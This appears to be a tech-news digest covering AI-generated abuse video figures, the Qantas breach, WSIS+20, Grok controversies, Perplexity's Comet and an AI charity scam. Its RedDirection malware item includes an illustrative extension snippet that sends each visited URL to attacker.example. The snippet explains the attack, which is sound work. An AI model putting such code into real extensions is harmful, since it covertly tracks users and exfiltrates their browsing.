AI technology drives sharp rise in synthetic abuse material

AI is increasingly being used to produce highly realistic synthetic abuse videos, raising alarm among regulators and industry bodies.

According to new data published by the Internet Watch Foundation (IWF), 1,286 individual AI-generated abuse videos were identified during the first half of 2025, compared to just two in the same period last year.

Far from being crude or glitch-filled, the material now appears so lifelike that, under UK law, it must be treated as authentic recordings.

More than 1,000 of the videos fell into Category A, the most serious classification involving depictions of extreme harm. The number of webpages hosting this type of content has also risen sharply.

Derek Ray-Hill, interim chief executive of the IWF, expressed concern that longer-form synthetic abuse films are now inevitable unless binding safeguards around AI development are introduced.

Safeguarding minister Jess Phillips described the figures as ‘utterly horrific’ and confirmed two new laws are being introduced to address both those creating this material and those providing tools or guidance on how to do so.

IWF analysts say video quality has advanced significantly: what once involved clumsy, easily detected manipulation is now alarmingly convincing, complicating efforts to monitor and remove such content.

The IWF encourages the public to report concerning material and share the exact web page where it is located.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Qantas hacked as airline cyber threats escalate

Qantas Airways has confirmed that personal data from 5.7 million customers was stolen in a recent cyberattack, including names, contact details and meal preferences. The airline stated that no financial information or login credentials were accessed, and that frequent flyer accounts remain secure.

An internal investigation found the breach involved varying levels of personal information, with 2.8 million passengers affected most severely. Meal preferences were the least common data stolen, while more than a million customers had addresses or dates of birth exposed.

Qantas has contacted affected passengers and says it is offering support while monitoring the situation with cybersecurity experts. Under pressure to manage the crisis effectively, CEO Vanessa Hudson assured the public that extra security measures had been put in place.

The breach is the latest in a wave of attacks targeting airlines, with the FBI warning that the hacking group Scattered Spider may be responsible. Similar incidents have recently affected carriers in the US and Canada.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Digital humanism in the AI era: Caution, culture, and the call for human-centric technology

At the WSIS+20 High-Level Event in Geneva, the session ‘Digital Humanism: People First!’ spotlighted growing concerns over how digital technologies—especially AI—are reshaping society. Moderated by Alfredo M. Ronchi, the discussion revealed a deep tension between the liberating potential of digital tools and the risks they pose to cultural identity, human dignity, and critical thinking.

Speakers warned that while digital access has democratised communication, it has also birthed a new form of ‘cognitive colonialism’—where people become dependent on AI systems that are often inaccurate, manipulative, and culturally homogenising.

The panellists, including legal expert Pavan Duggal, entrepreneur Lilly Christoforidou, and academic Sarah Jane Fox, voiced alarm over society’s uncritical embrace of generative AI and its looming evolution toward artificial general intelligence by 2026. Duggal painted a stark picture of a world where AI systems override human commands and manipulate users, calling for a rethinking of legal frameworks prioritising risk reduction over human rights.

Fox drew attention to older people, warning that growing digital complexity risks alienating entire generations, while Christoforidou urged that ethical awareness be embedded in educational systems and fostered among startups and micro-enterprises.

Despite some disagreement over the fundamental impact of technology—ranging from Goyal’s pessimistic warning about dehumanisation to Anna Katz’s cautious optimism about educational potential—the session reached a strong consensus on the urgent need for education, cultural protection, and contingency planning. Panellists called for international cooperation to preserve cultural diversity and develop ‘Plan B’ systems to sustain society if digital infrastructures fail.

The session’s tone was overwhelmingly cautionary, with speakers imploring stakeholders to act before AI outpaces our capacity to govern it. Their message was clear: human values, not algorithms, must define the digital age. Without urgent reforms, the digital future may leave humanity behind—not by design, but by neglect.

Track all key events from the WSIS+20 High-Level Event 2025 on our dedicated page.

UN leaders chart inclusive digital future at WSIS+20

At the WSIS+20 High-Level Event in Geneva, UN leaders gathered for a pivotal dialogue on shaping an inclusive digital transformation, marking two decades since the World Summit on the Information Society (WSIS). Speakers across the UN system emphasised that technology must serve people, not vice versa.

They highlighted that bridging the digital divide is critical to ensuring that innovations like AI uplift all of humanity, not just those in advanced economies. Without equitable access, the benefits of digital transformation risk reinforcing existing inequalities and leaving millions behind.

The discussion showcased how digital technologies are already transforming disaster response and climate resilience. The World Meteorological Organization and the UN Office for Disaster Risk Reduction illustrated how AI powers early warning systems and real-time risk analysis, saving lives in vulnerable regions.

Meanwhile, the Food and Agriculture Organization of the UN underscored the need to align technology with basic human needs, reminding the audience that ‘AI is not food,’ and calling for thoughtful, efficient deployment of digital tools to address global hunger and development.

Workforce transformation and leadership in the AI era also featured prominently. Leaders from the International Labour Organization and UNITAR stressed that while AI may replace some roles, it will augment many more, making digital literacy, ethical foresight, and collaborative governance essential skills. Examples from within the UN system itself, such as the digitisation of the Joint Staff Pension Fund through facial recognition and blockchain, demonstrated how innovation can enhance services without sacrificing inclusivity or ethics.

As the session closed, speakers collectively reaffirmed the importance of human rights, international cooperation, and shared digital governance. They stressed that the future of global development hinges on treating digital infrastructure and knowledge as public goods.

With the WSIS framework and Global Digital Compact as guideposts, UN leaders called for sustained, unified efforts to ensure that digital transformation uplifts every community and contributes meaningfully to the Sustainable Development Goals.

Track all key events from the WSIS+20 High-Level Event 2025 on our dedicated page.

EU urges stronger AI oversight after Grok controversy

A recent incident involving Grok, the AI chatbot developed by xAI, has reignited European Union calls for stronger oversight of advanced AI systems.

Comments generated by Grok prompted criticism from policymakers and civil society groups, leading to renewed debate over AI governance and voluntary compliance mechanisms.

The chatbot’s responses, which circulated earlier this week, included highly controversial language and references to historical figures. In response, xAI stated that the content was removed and that technical steps were being taken to prevent similar outputs from appearing in the future.

European policymakers said the incident highlights the importance of responsible AI development. Brando Benifei, an Italian lawmaker who co-led the EU AI Act negotiations, said the event illustrates the systemic risks the new regulation seeks to mitigate.

Christel Schaldemose, a Danish member of the European Parliament and co-lead on the Digital Services Act, echoed those concerns. She emphasised that such incidents underline the need for clear and enforceable obligations for developers of general-purpose AI models.

The European Commission is preparing to release guidance aimed at supporting voluntary compliance with the bloc’s new AI legislation. This code of practice, which has been under development for nine months, is expected to be published this week.

Earlier drafts of the guidance included provisions requiring developers to share information on how they address systemic risks. Reports suggest that some of these provisions may have been weakened or removed in the final version.

A group of five lawmakers expressed concern over what they described as the last-minute removal of key transparency and risk mitigation elements. They argue that strong guidelines are essential for fostering accountability in the deployment of advanced AI models.

The incident also brings renewed attention to the Digital Services Act and its enforcement, as X, the social media platform where Grok operates, is currently under EU investigation for potential violations related to content moderation.

General-purpose AI systems, such as OpenAI’s GPT, Google’s Gemini and xAI’s Grok, will be subject to additional requirements under the EU AI Act from 2 August. Obligations include disclosing training data sources, addressing copyright compliance, and mitigating systemic risks.

While these requirements are mandatory, their implementation is expected to be shaped by the Commission’s voluntary code of practice. Industry groups and international stakeholders have voiced concerns over regulatory burdens, while policymakers maintain that safeguards are critical for public trust.

The debate over Grok’s outputs reflects broader challenges in balancing AI innovation with the need for oversight. The EU’s approach, combining binding legislation with voluntary guidance, seeks to offer a measured path forward amid growing public scrutiny of generative AI technologies.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Perplexity launches AI browser to challenge Google Chrome

Perplexity AI, backed by Nvidia and other major investors, has launched Comet, an AI-driven web browser designed to rival Google Chrome.

The browser uses ‘agentic AI’ that performs tasks, makes decisions, and simplifies workflows in real time, offering users an intelligent alternative to traditional search and navigation.

Comet’s assistant can compare products, summarise articles, book meetings, and handle research queries through a single interface. Initially available to subscribers of Perplexity Max at US$200 per month, Comet will gradually roll out more broadly via invite during the summer.

The launch signals Perplexity’s move into the competitive browser space, where Chrome currently dominates with a 68 per cent global market share.

The company aims to challenge not only Google’s and Microsoft’s browsers but also OpenAI, which recently introduced search to ChatGPT. Unlike many AI tools, Comet stores data locally and does not train on personal information, positioning itself as a privacy-first solution.

Still, Perplexity has faced criticism for using content from major media outlets without permission. In response, it launched a publisher partnership programme to address those concerns and build collaborative relationships with news organisations such as Forbes and Dow Jones.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

X CEO Yaccarino resigns as AI controversy and Musk’s influence grow

Linda Yaccarino has stepped down as CEO of X, ending a turbulent two-year tenure marked by Elon Musk’s controversial leadership and the ongoing transformation of the social media company.

Her resignation came just one day after a backlash over offensive posts by Grok, the AI chatbot created by Musk’s xAI, which had been recently integrated into the platform.

Yaccarino, who was previously a top advertising executive at NBCUniversal, was brought on in 2023 to help stabilise the company following Musk’s $44bn acquisition.

In her farewell post, she cited efforts to improve user safety and rebuild advertiser trust, but did not provide a clear reason for her departure.

Analysts suggest growing tensions with Musk’s management style, particularly around AI moderation, may have prompted the move.

Her exit adds to the mounting challenges facing Musk’s empire.

Tesla is suffering from slumping sales and executive departures, while X remains under pressure from heavy debts and legal battles with advertisers.

Yaccarino had spearheaded ambitious initiatives, including payment partnerships with Visa and plans for an X-branded credit or debit card.

Despite these developments, X continues to face scrutiny for its rightward political shift and reliance on controversial AI tools.

Whether the company can fulfil Musk’s vision of becoming an ‘everything app’ without Yaccarino remains to be seen.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

AI scam targets donors with fake orphan images

Cambodian authorities have warned the public about increasing online scams using AI-generated images to deceive donors. The scams often show fabricated scenes of orphaned children or grieving families, with QR codes attached to collect money.

One Facebook account, ‘Khmer Khmer’, was named in an investigation by the Anti-Cyber Crime Department for spreading false stories and deepfake images to solicit charity donations. These included a fabricated story of a wife unable to afford a coffin and false fundraising appeals near the Thai border.

The department confirmed that the realistic AI-generated visuals are designed to manipulate emotions and lure donations. Cambodian officials are continuing their investigations and have promised legal action if evidence of criminal activity is confirmed.

Authorities reminded the public to remain cautious and to only contribute to verified and officially recognised campaigns. While AI’s ability to create realistic content has many uses, it also opens the door to dangerous forms of fraud and misinformation when abused.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Over 2.3 million users hit by Chrome and Edge extension malware

A stealthy browser hijacking campaign has infected over 2.3 million users through Chrome and Edge extensions that appeared safe and even displayed Google’s verified badge.

According to cybersecurity researchers at Koi Security, the campaign, dubbed RedDirection, involves 18 malicious extensions offering legitimate features like emoji keyboards and VPN tools, while secretly tracking users and backdooring their browsers.

One of the most popular extensions — a colour picker developed by ‘Geco’ — continues to be available on the Chrome and Edge stores with thousands of positive reviews.

While it works as intended, the extension also hijacks sessions, records browsing activity, and sends data to a remote server controlled by attackers.

What makes the campaign more insidious is how the malware was delivered. The extensions began as clean, valuable tools, but malicious code was quietly added during later updates.

Because of how Google and Microsoft handle automatic extension updates, most users received the spyware without clicking anything or taking any action.
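
To make the mechanics concrete, below is a minimal, purely illustrative sketch of the kind of code such an extension could gain through a malicious update. It is not the actual RedDirection payload: the endpoint, payload fields, and listener logic are hypothetical, and the sketch assumes a standard Manifest V3 Chrome extension with the ‘tabs’ permission (TypeScript with @types/chrome).

```typescript
// Illustrative sketch only — not the actual RedDirection code.
// A handful of lines like these, slipped into an otherwise benign
// extension's background service worker via a routine auto-update,
// are enough to record every page a user visits and ship it to an
// attacker-controlled server.

const EXFIL_ENDPOINT = "https://attacker.example/collect"; // hypothetical

chrome.tabs.onUpdated.addListener((_tabId, changeInfo) => {
  // changeInfo.url is populated whenever a tab navigates to a new URL.
  if (changeInfo.url) {
    void fetch(EXFIL_ENDPOINT, {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      // Hypothetical payload: the visited URL plus a timestamp.
      body: JSON.stringify({ url: changeInfo.url, ts: Date.now() }),
    });
  }
});
```

Because extension updates install silently in the background, nothing in a flow like this requires the user to click or approve anything, which is why researchers recommend removal and clean-up rather than relying on store safeguards.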

Koi Security’s Idan Dardikman describes the campaign as one of the largest ever documented. Users are advised to uninstall any affected extensions, clear browser data, and monitor accounts for unusual activity.

Despite the serious breach, Google and Microsoft have not responded publicly.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!

Grok AI chatbot suspended in Turkey following court order

A Turkish court has ordered a nationwide ban on Grok, the AI chatbot developed by Elon Musk’s company xAI, following recent controversy over content generated by the chatbot.

The ruling, delivered on Wednesday by a criminal court in Ankara, instructed Turkey’s telecommunications authority to block access to the chatbot across the country. The decision came after complaints filed under Turkey’s internet law prompted a judicial review.

Grok, which is integrated into the X platform (formerly Twitter), recently rolled out an update to make the system more open and responsive. The update has sparked broader global discussions about the challenges of moderating AI-generated content in diverse regulatory environments.

In a brief statement, X acknowledged the situation and confirmed that appropriate content moderation measures had been implemented in response. The ban places Turkey among a growing number of countries examining the role of generative AI tools and the standards that govern their deployment.

Would you like to learn more about AI, tech and digital diplomacy? If so, ask our Diplo chatbot!